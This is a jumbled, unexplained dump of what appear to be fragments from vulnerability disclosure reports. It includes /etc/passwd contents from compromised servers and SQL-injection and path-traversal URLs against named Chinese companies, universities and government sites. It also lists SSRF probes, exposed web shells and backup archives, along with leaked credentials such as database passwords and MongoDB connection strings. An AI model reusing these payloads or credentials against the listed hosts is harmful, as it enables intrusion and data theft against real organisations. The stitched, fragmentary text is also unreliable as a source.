gianna:x:2927:80:**.**.**.**:/export/web/gianna:/sbin/nologin biegoinc:x:2929:80:**.**.**.**:/export/web/biegoinc:/sbin/nologin nexsos:x:2932:80:**.**.**.**:/export/web/nexsos:/sbin/nologin pontitdg:x:2934:80:**.**.**.**:/export/web/pontitdg:/sbin/nologin gowingroup:x:2935:80:**.**.**.**:/export/web/gowingroup:/bin/sh iskydesign:x:2941:80:**.**.**.**:/export/web/iskydesign:/sbin/nologin talentfocushk:x:2942:80:**.**.**.**:/export/web/talentfocushk:/sbin/nologin taihingproducts:x:2944:80:**.**.**.**:/export/web/taihingproducts:/sbin/nologin nasonpearl:x:2946:80:**.**.**.**:/export/web/nasonpearl:/sbin/nologin miyabihk:x:2947:80:**.**.**.**:/export/web/miyabihk:/bin/sh vizzpromotion:x:2948:80:**.**.**.**:/export/web/vizzpromotion:/sbin/nologin mppromo:x:2954:80:**.**.**.**:/export/web/mppromo:/sbin/nologin nashkhk:x:2955:80:**.**.**.**:/export/web/nashkhk:/sbin/nologin phonebuytest:x:2956:80:**.**.**.**:/export/web/phonebuytest:/sbin/nologin tonwell:x:2958:80:**.**.**.**:/export/web/tonwell:/sbin/nologin rhemaengineer:x:2959:80:**.**.**.**:/export/web/rhemaengineer:/sbin/nologin shundatest01:x:2964:80:**.**.**.**:/export/web/shundatest01:/sbin/nologin pretterior:x:2965:80:**.**.**.**:/export/web/pretterior:/bin/sh pressroom01:x:2966:80:**.**.**.**:/export/web/pressroom01:/sbin/nologin tastefulbeers:x:2967:80:tastefulbeers.biz:/export/web/tastefulbeers:/sbin/nologin northwing:x:2969:80:**.**.**.**:/export/web/northwing:/sbin/nologin uarm:x:2970:80:**.**.**.**:/export/web/uarm:/sbin/nologin chunkeehk:x:2971:80:**.**.**.**:/export/web/chunkeehk:/sbin/nologin mesadahk:x:2974:80:**.**.**.**:/export/web/mesadahk:/sbin/nologin jobsasap:x:2975:80:**.**.**.**:/export/web/jobsasap:/sbin/nologin phplisttest:x:2976:80:**.**.**.**:/export/web/phplisttest:/bin/sh heltexfashion:x:2980:80:**.**.**.**:/export/web/heltexfashion:/bin/sh ambrosiacuisine:x:2982:80:**.**.**.**:/export/web/ambrosiacuisine:/bin/sh pontiwinecell:x:2984:80:**.**.**.**:/export/web/pontiwinecell:/sbin/nologin 
pontiwinesg:x:2985:80:**.**.**.**.sg:/export/web/pontiwinesg:/sbin/nologin hktjq:x:2989:80:**.**.**.**:/export/web/hktjq:/bin/sh http://**.**.**.**/downproject.php?u=../../configs/config.inc.php http://**.**.**.**/about.asp?id=7T5YU3R4-25YO-2CXB-N2M3-BGOD00IUPFKP http://**.**.**.**/k3cloud/ http://www.sfc.sinopec.com/ http://www.sfc.sinopec.com/image.aspx?fileid=1%27xor%28extractvalue%281,if%28ascii%28substr%28user%28%29,1,1%29%29%3E1,1,0x22%29%29%29or%271 http://**.**.**.**/login.do http://xyh.nchu.edu.cn/md.aspx?c=A1&page=3&t=0 http://180.169.84.54:7010/payment/ http://202.108.103.169:9003/weixinAdmin/loginController.do?login http://202.108.103.169:9003/weixinAdmin/webpage/system/druid/weburi.html http://home.meishichina.com/apps/163/weibo_app/ic.php?ac=login这个地方的登录位置没有登录验证限制 http://career-oj.huawei.com http://career-oj.huawei.com/exam/campusForumAction?method=bbsUserInfo&userId=114311913@qq.com http://211.154.172.113:8090/ http://211.154.172.30:8090/ http://oa.xinxindai.com/login/Login.jsp?logintype=1&languageid=7&message=120 http://1.85.2.249:89/login.do http://122.224.218.142:7070/supplier/jsp/index.jsp http://**.**.**.**/qasss/login.jsp?logout=true http://58.215.43.30/console/login/LoginForm.jsp http://**.**.**.**/query/editorder.aspx?warerequestid=60e7c5c581d87468e5e7527431*42f0ebd4930e03c6ed54f1c37a07692bfcf9a885cec4e0fa064decbae017e3dc03fa32ab807f9d7aef869f76b8328b016a547ca5b4f49e21070060999df5{}&wjid=270662 http://**.**.**.**/apply/showapplyapprove.aspx?id=3783 http://**.**.**.**/EmployAgree/BsPubDict.do?method=getPubDictJson&type=%E5%AD%A6%E5%8E%86%E4%BB%A3%E7%A0%81%E7%B1%BB%E5%88%AB&required=true(注入点) http://**.**.**.**/web.rar http://**.**.**.**/admin/admin_login.aspx http://**.**.**.**/login/adminindex.jsf http://**.**.**.** http://**.**.**.**/page.php?pkey=9 http://**.**.**.**/event_result.php?event_pkey=17 http://**.**.**/SPXzzfApp/base/spBaseXzzfOpenAction_provinceOf!toSpXzzfOpenSC.actioninfoTypeCode=1 admin.php/Index/main 
http://**.**.**.**/culture_list.jsp?curPage=1&MenuID=104006 http://www.risun.com/ http://im.risun.com:9901/我看了一下这个站点。 http://im.risun.com:9901/backup/1.zip http://10.11.6.206/portal_top.html http://10.11.7.54/ http://10.11.7.77/ http://10.11.7.208/ http://10.11.9.205/fax/general_setup.html?kind=item http://10.11.9.208/H28_0_0_d_net.html http://10.11.9.254/admin/index.htm http://10.11.9.254/admin/noteManage/CallNote_Detail.aspx?RecordingID=10267%27 http://**.**.**.** http://**.**.**.**/hnportal/ http://**.**.**.**/portal/site/site/portal/ha http://**.**.**.**/portalV3/site/site/portal/j http://**.**.**.**:8011 http://shop.ehuatai.com/ ip:219.141.242.77 http://shop.ehuatai.com/myname/index.jsp http://shop.ehuatai.com/myname/wooyun.jsp http://oa.cnbg.com.cn/seeyon/index.jsp http://oa.cnbg.com.cn/seeyon/management/index.jsp http://**.**.**.**/loginOutAction_userLoginOut.do http://cc.nju.edu.cn https://**.**.**.**/wind1901/KC01/blob/7ab81811ff35241049782f52391c9e3cf02cc03d/%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF.txt http://www.chanhen.com:801/ http://www.chanhen.com:801//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://mse.tju.edu.cn/blog_program_detail.php?id=100&nid=76 http://**.**.**.**/ggdetail.aspx?id=7532 http://**.**.**.**/ggdetail.aspx?id=7532 http://hets.huatu.com http://api.jiayuan.com/level/interceptProductList.php?token=b242cad9b05795dffebf8163cf9655d6566190e1c450c8.63594016&uid=146224377&clientid=13&level_type=6&changeid=0&isJailbreak=0&page_id=234000&ver=5.6&lang=zh-Hans&channelid=006 http://222.178.225.45/ http://222.178.225.48/)的c段扫出来的 http://218.80.224.37/ http://218.80.224.37/这个站 http://**.**.**.**/bsfw/Home/Index/domain/did/0101.html http://**.**.**.**/login.asp http://chedui.cztv.tv/login.asp http://numericaltank.sjtu.edu.cn http://proposal.guohualife.com:8090/ http://proposal.guohualife.com:8091/proposalproxy/api/proposal/plan/planwebservice?WSDL 
http://proposal.guohualife.com:8091/proposalproxy/api/proposal/query/querywebservice?WSDL http://proposal.guohualife.com:8091/proposalproxy/api/proposal/system/systemwebservice?WSDL http://proposal.guohualife.com:8091/proposalproxy/api/proposal/customer/customerwebservice?WSDL itsm.yh.hundsun.com/yhitsm/loginAction.action http://www.itnclub.com http://oa.hundsun.com http://testpm.hundsun.com http://service.jr.hundsun.com http://service.hundsun.com http://en.hundsun.com http://service.hundsun.com http://itsm.yh.hundsun.com http://vote.hundsun.com http://vote.hundsun.com http://www.itnclub.com http://service.jr.hundsun.com http://en.hundsun.com itsm.yh.hundsun.com/yhitsm/loginAction.action命令执行 sa:qwer@asdf http://**.**.**.**/back/login.jsp http://**.**.**.** ftp://218.58.70.164/excel/ http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 http://218.26.176.181:8082/yyoa/ http://**.**.**.**/Chinese/drivers/drivers/index.php/Download/Index/model.html?id=107 http://**.**.**.**/admin.php?c=Index&a=login http://www.teachina.com/editor/xheditor/src/xheditor-zh.aspx?page=cmd http://61.184.32.10:8888/1.jsp http://60.13.152.246/ceshi/ www.pangthai.com http://liantong.cheyipai.com/Auction/List http://liantong.cheyipai.com http://218.61.5.105/ http://mathc.neu.edu.cn http://182.151.206.253/ http://**.**.**.**/View/permissionitem_list_Sort.aspx?type=dpt&dptno=63 http://**.**.**.**/View/selpermissionitem.aspx http://cme.gxwskjw.91huayi.com/report/publicedList.aspx?displayMode=1&frontForUnit=1&holdYear=2015&lowUnitCode=200001&principalName=anxtbfog&projectCode=124&projectKind=1&projectName=bcrpvkel&publicBatch=-1&subject2=01&subject3=0101 www.luolan.com http://**.**.**.**/Ashx/ResearchList1.ashx?p=&ReportCategoryID=4b88cfc1-7389-42a5-964b-4cf0899af29d&labId= http://**.**.**.**/hypage/SceneService.aspx?ListId=29E63F29C697442C9E0BC78B9125A612&SceneServiceNO=0 
http://**.**.**.**/hypage/BroadcastView.aspx?infoid=ceee60d7-4f56-40ef-81bc-bfb217992e2f http://**.**.**.**/hypage/SPZNTables_hy.aspx?itemid= http://**.**.**.**/hypage/ItemSearch.aspx?SearchKey= http://**.**.**.**/hypage/ItemShowPower.aspx?itemType=xk https://hmall.huazhu.com/member_address.html?addressid=353&opt=2&back=1 http://**.**.**.**:8088/esms/login_toLogin.do http://**.**.**.**:8088/esms/bak.jsp http://hmall.huazhu.com:80/ http://**.**.**.**:7003/gjfpb/login.jsp http://thrd.cofco.com/web/device/login?lang=1 http://202.96.11.44/ http://202.96.11.44:8080/CmnoaWeb/ http://centermath.hit.edu.cn/userlogin.asp http://106.39.17.117:8088/ESSSWebII/ http://lotus.suning.com/forum.php http://www.qumaiya.com/ http://58.22.102.118:8090/ http://career.shisu.edu.cn/fr/-1?p_p_col_count=1&p_p_col_id=column-1&p_p_id=news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y&p_p_lifecycle=0&p_p_mode=view&p_p_state=pop_up&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_action=shownewsmore&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_currentPage=1&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_nid=18050&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_sid=0&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_tid=-1 http://ttr.acfun.tv http://**.**.**.**/private/cms/zxgt/bjgg?xzqh=340000 http://**.**.**.**/private/qlqd/t_hits_qlqd/zfqdlist?xzqh=340000&type=0011&dept_code=29&site_id=0009 http://**.**.**.** http://182.151.206.253/ http://**.**.**.**/Admin/login.aspx http://**.**.**.**/web.zip http://**.**.**.**/web.zip http://124.207.74.206/redmine/login http://**.**.**.**/default/ http://**.**.**.**/index.php?m=content&c=index&a=annotation_new_window&ann_id= http://**.**.**.**/?m=content&c=index&a=card_order&card_id=19&type=1&city= http://**.**.**.**/index.php?m=insurance&c=index&a=viewpdf_post&planId=117&clauseId=23 http://180.168.34.2:8080 http://www.daoway.cn/ http://www.daoway.cn/dian/#/login商家后台地址 http://api.daoway.cn/daoway/rest/service/ea807b31d68041a2859c292c9e8594bf?&lot=111&lat=112&imei=121 
http://58.22.102.44/test http://58.22.102.43/test http://58.22.102.42/test http://58.22.102.9/test http://58.22.102.42/nohup.out http://58.22.102.41/nohup.out http://58.22.102.5/nohup.out http://**.**.**.**:9983/seeyon/index.jsp http://58.248.41.170:80/uddiexplorer/SearchPublicRegistries.jsp http://58.248.41.216/uddiexplorer/SearchPublicRegistries.jsp http://58.248.41.233/uddiexplorer/SearchPublicRegistries.jsp http://58.248.41.246/uddiexplorer/SearchPublicRegistries.jsp http://125.88.6.170/uddiexplorer/SearchPublicRegistries.jsp http://125.88.6.216/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.**/ http://**.**.**.** root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin pulse:x:497:494:PulseAudio Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated 
SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbi root1:x:0:0::/home/root1:/bin/bash monitor:x:500:500::/home/monitor:/bin/bash vnstat:x:496:492:vnStat user:/var/lib/vnstat:/sbin/nologin mysql:x:501:501::/home/mysql:/bin/bash DDBQz9DlcpWJtchbb0:16528:0:99999:7 http://www.shijipay.net/ http://nissancorp.dealer.youxinpai.com http://gtmc.dealer.youxinpai.com http://jlr.dealer.youxinpai.com http://xd2sc.dealer.youxinpai.com http://ftms.dealer.youxinpai.com http://dongfeng-citroencorp.dealer.youxinpai.com http://ford.dealer.youxinpai.com http://chrysler.dealer.youxinpai.com http://ghac.dealer.youxinpai.com http://gmmc.dealer.youxinpai.com http://chery.dealer.youxinpai.com http://faw-vw.dealer.youxinpai.com http://faw-mazda.dealer.youxinpai.com http://peugeotcorp.dealer.youxinpai.com http://wdhac.dealer.youxinpai.com http://fawcar.dealer.youxinpai.com http://tubic.tju.edu.cn/zcurve/query.php?selclass=8&selfield=deebi&term=SARS http://219.143.252.247:8084/WebAppQuery.asmx http://oa.cofco-keystone.com/ http://192.168.3.43:8089/redmine/account/lost_password?token=fcc669e46ca3ff5b4e2bccc693656de2459f1410 http://219.143.252.189:8088/seeyon/index.jsp http://dmoo.cofco.com/dmoo/jsp/main.jsp https://mail.cofco-keystone.com/owa/# http://192.168.0.5:82 http://58.250.145.98:82 http://192.168.0.5:82 http://58.250.145.98:82 http://**.**.**.** http://**.**.**.**/data/AjaxService.aspx?method=selectypml&pageSize=10&pageIndex=1&n=1 http://**.**.**.**/data/AjaxService.aspx?method=lGetResultsByall2&liaoning=211100%20or%201=1&pageIndex=0&pageSize=20&sortField=&sortOrder= http://**.**.**.**/shops/newsinfo.aspx?args=abc&args1=dongji&args2=283 http://**.**.**.**/eng/special_prop/special_prop.php http://www.mei.com/)网站可重置任意用户口令。 http://www.mei.com/user/tofindPassWord。 http://cemftp.ce-air.com/yyoa/seeyonDownLoadPic?filename=../../../../../../../../../../windows/win.ini&userFileType=1 
http://complaint.ce-air.com/uddiexplorer/SearchPublicRegistries.jsp http://complaint.ceair.com/uddiexplorer/SearchPublicRegistries.jsp http://complaint.ceair.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.20.35.90:8080&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search http://**.**.**.** http://**.**.**.**/database/database.mdb http://**.**.**.**/adminLogin/login.asp http://**.**.**.**/AdminLogin/PicUpload.asp http://**.**.**.**/ActicleShow.aspx?SectionId=56f313f6-1a75-4df4-9d0e-eed964132382 www.rongwm.com/search.php http://**.**.**.**/1.rar http://www.ewj.com/find_password.html http://wooyun.org/bugs/wooyun-2015-0147477 http://www.scrcoa.com//yyoa/assess/js/initDataAssess.jsp http://www.scrcoa.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.scrcoa.com//yyoa/createMysql.jsp http://www.scrcoa.com//yyoa/ext/createMysql.jsp http://www.scrcoa.com//yyoa/ext/trafaxserver/SystemManage/config.jsp http://www.scrcoa.com//yyoa/checkWaitdo.jsp?use http://www.scrcoa.com//yyoa/checkWaitdo.jsp?userID=1* http://220.178.6.140:8080/defaultroot/login.jsp http://220.178.6.140:8080/defaultroot/work_flow/formOptJSPUpload.jsp http://220.178.6.140:8080/defaultroot/work_flow/zhengkai.jsp http://www.dupv.com/flash_info.php?id=3168 http://jingjia.ecnu.edu.cn/sggl/wsjj/ggztDetails.jsp?WID=1 http://wap.guolian-life.com/ http://**.**.**.**/portal/login http://**.**.**.**/index.php/Information/newsDetail?type=2&id=45 http://**.**.**.** http://211.154.173.238:7007/picc/index.jspx http://211.154.173.238:7007/console https://mail.ceair.com/owa/# http://union.ceair.com/ http://b2e.ceair.com/ http://union.ceair.com/web/news/NewsInfo.aspx?nid=b0b534ca-d546-4eb2-ae8a-a425006c311d http://172.20.35.90:8080/ http://172.20.35.89:8080/ http://172.20.35.90:8080/ http://172.20.35.91:8080/ http://10.20.200.17:8080/jmx-console/ http://10.20.200.17:8080/jmx-console/ http://172.20.35.181/doc/page/main.asp 
http://**.**.**.**/bugs/wooyun-2015-0116152 http://**.**.**.**/bugs/wooyun-2015-0156894 http://www.teachina.com/htdocs.rar http://www.xsgzsppa.zjut.edu.cn/listarticle1.aspx?isimg=wzlosJEn&pageno=77&tid= http://www.chanhen.com:801 http://**.**.**.**/null上传的文件名.jsp http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://web.alltrust.com.cn:7001/ http://ku.games.renren.com/?proid=14 http://ku.games.renren.com/?proid=14 http://ku.games.renren.com/?proid=14 http://service.guobin.net:3737/index.htm http://jdkf.aisino.com/ http://60.13.152.246/ http://60.13.152.246/ceshi/ http://125.32.49.240/console/login/LoginForm.jsp http://**.**.**.**/index.php?fn=news&fn1=detail&no=285&no5=C http://***.***.***.***:****/eGov/BBS.nsf/bbadbe08be31c15648256be30009736a/afcf0d9cbfb3e3e748257f1200424b6f/$FILE/[密码:***]******.jpg;1.asa http://***.***.***.***:****/names.nsf/$users http://***.***.***.***:****/names.nsf/912366901f00a457852561c20069b844/19f1f087c38af43a48257784000d9ea0?OpenDocument http://58.215.43.130:8090/code http://bus.satrip.com/login/login.aspx http://**.**.**.**:9080/ http://**.**.**.**:9080/search.aspx?key=0&searchCondition=1&rnd=0.1638494268991053 http://**.**.**.**:8088/ http://**.**.**.**:8088 http://cw.mszq.com/portal/app/mockapp/login.jsp?lrid=1 http://cw.mszq.com/uapws/service/ http://cw.mszq.com/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl http://**.**.**.**/bugs/wooyun-2015-0146585 http://**.**.**.**/en/People/Professor/individual.php?TeacherID=T8166 http://**.**.**.** http://**.**.**.**/download.php?filename=download.php http://i.ptbus.com/findpassword i.ptbus.com/findpassword_email?email=fuck@ptbus.com&time=1449329841&key=d3d8d1b02e399c16c9df465e9dd8fdc2 http://www.tempus.cn/ http://113.105.64.204:7001/console/login/LoginForm.jsp http://**.**.**.**/ http://**.**.**.**/wwwroot.rar http://www.mogujie.com/tuan/utadmin/adminlog?adminName=&sellerName=&startDate=2013-08-25&endDate=2015-12-06&opStepMask=&opTypeMask=&bid= 
http://211.154.172.104:8010 http://211.154.172.104:8011 http://wendan.foxconn.com/member/login.aspx http://wendan.foxconn.com/member/GetPsw.aspx http://**.**.**.**/eproject/eproject.asp?project_id=2 http://easternmiles.ceair.com/mpf/#/sign/forget http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://oa.sfn.cn/oa/Jhsoft.Web.login/AjaxForLogin.aspx http://easternmiles.ceair.com/mpf/password/valid http://easternmiles.ceair.com http://**.**.**.**/ http://www.teupay.cn/ http://111.202.33.107:8080/mbp/login.jsp http://zone.wooyun.org/content/23905 http://www.hs-post.com/igenus/login.php http://www.hs-post.com/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpeg&cmd=form http://auto.xizi.com http://gsl.sdu.edu.cn/newuser/newuser-checkaccount.jsp?useraccount=-1 http://easternmiles.ceair.com/mpf/#/sign/signin http://i.178.com/?_action=getgamedata&_app=game&_controller=gamedata&id=1 http://bbs.onlylady.com/member.php?mod=logging&action=login&referer=http%3A%2F%2Fwww.onlylady.com%2F登录位置的验证码,好像只要不刷新页面就一直不会变 http://design.hnu.edu.cn/ http://design.hnu.edu.cn http://www.brightdairy.com:8084/ http://www.brightdairy.com/ http://cx.nju.edu.cn http://**.**.**.**:8182/uie/index.action?_domain=**.**.**.** IP:10.161.217.251 http://cstc.shutcm.edu.cn/ http://cstc.shutcm.edu.cn http://**.**.**.**/ http://**.**.**.**:8080/login.jsp https://**.**.**.**/wap/member/phoneCheckCodeSend.action?phoneNumber=手机号码 http://58.62.185.148:88/seeyon/index.jsp http://**.**.**.**/book.php?book_sn=1115 http://**.**.**.**/indexPage.action?columnId=402881ee4debedd8014debf8d0570004 http://**.**.**.**/是个政府网站,大体扫描了下,防注入做的很好,还会记录注入的类型、时间和攻击者的ip地址。 http://**.**.**.**/Shownews.php?cid=1&id=27911 mongodb://oplogger:xiaoniu2015@10.162.196.65:27017/local?authSource=admin mongodb://xiaoniu:xiaoniu2015@10.162.196.65:27017/niu http://app.cloud.niu.com/ http://zone.wooyun.org/content/23858 http://oa.lnsyy.cn http://221.8.57.106:7012/console/login/LoginForm.jsp 
http://221.8.57.106:7012/wooyun/shell.jsp http://www.yundaiwang.com/ http://www.yundaiwang.com/index.php?user&q=action/login http://www.yundaiwang.com/bbs/index.html?q=forums&fid=13%20ande%20aa http://www.yundaiwang.com/?user&q=action/getpwd http://manager.uts.letv.com/admin.do http://**.**.**.** http://**.**.**.**/admin/login.asp http://**.**.**.**/zxyh_show.php?id=77 http://**.**.**.**/people/bio.php?PID=16 http://m.qk365.com/admin/selfquery/consumeElectricity.jsp http://m.qk365.com/admin/selfservice/electricityRecharge.jsp http://**.**.**.**:7001/ http://**.**.**.**/page/show_news.php?id=420 https://mail.midea.com https://vpn.midea.com http://10.16.10.53 http://e.picclife.com:7006/index.jspx http://e.picclife.com:7006/console/login/LoginForm.jsp http://mobile.jxlife.com.cn/ http://mobile.jxlife.com.cn http://tsp.cpic.com.cn/ http://**.**.**.**/sitecn/aspx/bzzx.aspx?tid=1648 http://**.**.**.**/ http://**.**.**.**/login.htm http://**.**.**.**/Sites/Store/GoodsDetils.aspx?autoID=1 http://**.**.**.**/Sites/Resource/IndexList.aspx?XD=2 http://**.**.**.**/txt_more.aspx?groupID=29&&orderbyID=1&&page=1 http://**.**.**.**/District/DisDefault/NewVideo.aspx?order= http://**.**.**.**/PlatRegister/GetXN.aspx?depID= http://**.**.**.**/OA/OA_BasicManagement/SetUserDuty.aspx?dutyId= http://**.**.**.**/Public/FileDownload.aspx?fileID= http://**.**.**.**/CenterSpace/CenterSpace4YQ/VideoManagerVEdit.aspx?videoID= http://**.**.**.**/School/SchoolResouse/ResourceShow.aspx?fid=250801 http://**.**.**.**/CenterSpace/CenterSpace4LBB/Recommend_friends.aspx?num=5 http://**.**.**.**/CenterSpace/CenterSpace4DJH/ReplyList.aspx?share_id= http://**.**.**.**/ http://**.**.**.**/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1 https://**.**.**.**/index.jsp https://**.**.**.**/shell.jsp http://homs.hs.net/account/login.do http://homs.hs.net http://homs.hs.net/account/login.do http://homs.hs.net/admin/login.do http://homs.hs.net http://homs.hs.net/admin/login.do 
http://**.**.**.**:7080/zsj/index.htm http://www.sdjnnews.com/hgzqtz/ http://www.sdjnnews.com/lhc/ http://www.sdjnnews.com/lhckj/ http://www.sdjnnews.com/lhckjjg/ http://www.sdjnnews.com/lhd/ http://www.sdjnnews.com/lhj/ http://www.sdjnnews.com/lp/ http://www.sdjnnews.com/m88/ http://www.sdjnnews.com/hgzqw/ http://www.sdjnnews.com/hhl/ http://www.sdjnnews.com/hhs/ http://www.sdjnnews.com/hjcylc/ http://www.sdjnnews.com/hjdc/ http://www.sdjnnews.com/hlgj/ http://www.sdjnnews.com/hq/ http://www.sdjnnews.com/hygj/ http://www.sdjnnews.com/jbb/ http://www.sdjnnews.com/jkmnxy/ http://www.sdjnnews.com/jsylc/ http://www.sdjnnews.com/lb/ http://www.sdjnnews.com/lbbc/ http://www.sdjnnews.com/llxs/ http://www.fsgp.cn/ambjl/ http://www.fsgp.cn/amdc/ http://www.fsgp.cn/amwnsr/ http://www.fsgp.cn/bcw/ http://www.fsgp.cn/dbw/ http://www.zyu8.com/bocaigongsi/ http://bbs.koofang.com http://pay.guolian-life.com:7001/ http://**.**.**.**/) http://**.**.**.**/uuser/order_index?order_key=2011&order_time=&order_status=0),order_key是注入点。 http://**.**.**.**/ http://**.**.**.**/扶贫基金会weblogic存在网站序列化漏洞 http://**.**.**.**/css.jsp http://**.**.**.**/webdecl/loginAction!init.action http://**.**.**.**/ http://114.251.196.89/www/ http://**.**.**.**/xinying/chaxun/Select_name.jsp http://**.**.**.**/xinying/chaxun/Select_name.jsp http://**.**.**.**/cnchs/news_detail.php?serial=97 http://**.**.**.**/cnchs/news_detail.php?serial=97 www.wooyun.org/bugs/wooyun-2015-0145919 http://word.iciba.com/ http://word.iciba.com/?action=my http://word.iciba.com/?action=cibasns http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a http://www.cnautotime.cn/news.php?rid=239 http://www.cnautotime.cn/news.php?rid=23039 http://bbs.360che.com/clublist.php?clubid=57&orderby=lastpost http://sqlmap.org http://**.**.**.**/HotSale/products.aspx?catno=12&subcatid=32 
http://**.**.**.**/HotSale/products.aspx?catno=12&subcatid=32 http://www.monmsl.cc/zh-cn/read.jsp?id=1,如图所示: http://**.**.**.**/Cjsfw_list.php?Pid=74 http://**.**.**.**/news-detail.php?id=1000014161 http://**.**.**.**/news-detail.php?id=1000014161 http://**.**.**.**/psc/2001/update/maintain/ http://sh4g.gtja.com/portal_sh/register.jhtml http://**.**.**.**/faq_detail.html?id=18 http://**.**.**.**/faq_detail.html?id=18 http://**.**.**.**/bbs/zboard.php?id=eyes_info&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&no=44 http://**.**.**.**/bbs/zboard.php?id=eyes_info&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&no=44 http://**.**.**.**/news/?mode=data&id=126 http://**.**.**.**/news/?mode=data&id=126 http://**.**.**.**/bugs/wooyun-2015-0137850 http://**.**.**.**/show.php?id=3&newsid=1280 http://**.**.**.**/show.php?id=3&newsid=1280 http://**.**.**.**/artdecorationdetail.aspx?sguid=e6c0033100b848dd85888e5c16f40e72 http://**.**.**.**/artdecorationdetail.aspx?sguid=e6c0033100b848dd85888e5c16f40e72 http://**.**.**.**/en/news/news_detail.html?news=377 http://**.**.**.**/en/news/news_detail.html?news=377 http://**.**.**.**/Shop.aspx?shopid=15928 http://**.**.**.**/Shop.aspx?shopid=15928 http://wq.jx163.com/ http://wq.jx163.com/loginSSO.action?username=ztjxadmin&password=5D3EA3110DFC1783&url=/WEB-INF/jsp/main.jsp&reloginUrl=/WEB-INF/jsp/login.jsp http://**.**.**.**/information/index.php?parent_id=298 http://gp.webinar.foxconn.com/Index.aspx http://gp.webinar.foxconn.com/pages/registeren.aspx ns:return ns:return http://**.**.**.**/Tool/SupportTool.ashx?InitialCount=1&ID=92&Type=finance&callback=jsonp1449335506048&_=1449335507425 http://**.**.**.**/directory_user_en.php?id_key=7&eng=T http://www.mcqyy.com/RunCode/php http://www.mcqyy.com/RunCode/php5.4/ http://www.mcqyy.com/RunCode/php5.6/ http://www.mcqyy.com/RunCode/python/ http://www.mcqyy.com/RunCode/python3/ http://www.taowola.com/gift.php?type=info&id=200 
http://**.**.**.**/serch/search.asp http://afis.hit.edu.cn http://www.wandahotels.com/index.php?a=show_discount&c=index&id=46&m=content http://www.wandahotels.com/index.php?a=show_discount&c=index&id=46&m=content http://gxkh.gtja.com/ http://gxkh.gtja.com/kf.asp http://gxkh.gtja.com/lccpk_detail.asp?id=188&type_id=23 http://gxkh.gtja.com/news.asp http://gxkh.gtja.com/news_detail.asp?id=176&opt=next&type_id=60 http://qiao.baidu.com/v3/?module=default&controller=index&action=doMess&siteid=5972168&page_id=&ucid=7988163 http://www.yayan.fudan.edu.cn/showArticle.php?akey= http://www.yayan.fudan.edu.cn/cuListYwArc.php?vol= http://wap.jxlife.com.cn http://www.youth.sdu.edu.cn/login.do http://www.youth.sdu.edu.cn/data.jsp http://mailbox.ycu.edu.cn/Login.asp?MailId=5 http://article.zhaopin.com/uddiexplorer/SearchPublicRegistries.jsp http://192.168.10.53:7001/uddi/uddilistener http://wooyun.org/bugs/wooyun-2010-0157542 http://campus.coolpad.com/index.php?c=submitResumes&f=saveProjectInfo http://**.**.**.** http://www.qzyy.net.cn/quality_detail.asp?id=-1 http://bjcme.91huayi.com/Page/SheetDownload.aspx?lm=1 http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/seeyon/management/index.jsp http://a.ikangdental.com http://a.ikangdental.com/log http://a.ikangdental.com/log/2015-04-21.txt http://pos.manwahgroup.com/ ftp://123.162.191.120/没有设置密码,可以直接访问,整站源码可以down下来 http://xml.rayli.com.cn/xf/?a=t&id=1&m=topic http://**.**.**.**/newsshow.php?id=2255 